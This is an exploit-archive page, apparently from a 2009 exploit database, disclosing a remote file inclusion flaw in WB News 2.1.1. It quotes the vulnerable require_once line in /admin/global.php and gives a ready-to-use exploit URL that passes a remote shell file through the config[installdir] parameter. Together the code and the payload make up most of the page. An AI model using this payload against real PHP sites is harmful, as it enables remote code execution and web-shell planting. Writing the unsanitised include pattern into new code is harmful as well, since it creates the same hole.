[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : WB News 2.1.1 config[installdir] Remote File Inclusion Vulnerability
# Published : 2009-02-09
# Author : ahmadbady
# Previous Title : sourdough 0.3.5 Remote File Inclusion Vulnerability
# Next Title : Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability


-----------------:Remote File Include:-----------------
-------------------------------------------------------
script:wb news v2.1.1
    
------------------------------------------------------------------
download from:http://www.webmobo.com/downloads/
   
------------------------------------------------------------------

.......................................................
vul: /admin/global.php line 32;

  
require_once( $config["installdir"] . "/includes/constants.php" );

------------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/admin/global.php?config[installdir]=shell.txt?

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady  [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# www.Syue.com [2009-02-09]